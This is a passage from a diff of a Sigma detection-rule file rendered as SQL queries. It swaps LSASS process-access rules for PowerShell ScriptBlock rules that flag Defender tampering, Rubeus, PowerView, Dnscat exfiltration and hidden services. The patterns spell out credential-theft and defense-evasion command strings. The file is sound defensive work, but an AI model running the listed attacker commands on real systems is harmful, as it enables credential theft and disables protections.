ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.003", + "attack.t1027", "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", - "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. 
This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.t1003.003" ], "falsepositives": [ - "Likely" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' 
ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 
'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": "proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", - "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "status": "experimental", + 
"description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "title": "Dnscat Execution", + "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "status": "test", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", + "tags": [ + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." 
+ "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", - "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE 
'%editionupgrademanagerobj.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + "title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE 
'%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - 
"filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": 
"proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", - "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", + "status": "experimental", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE 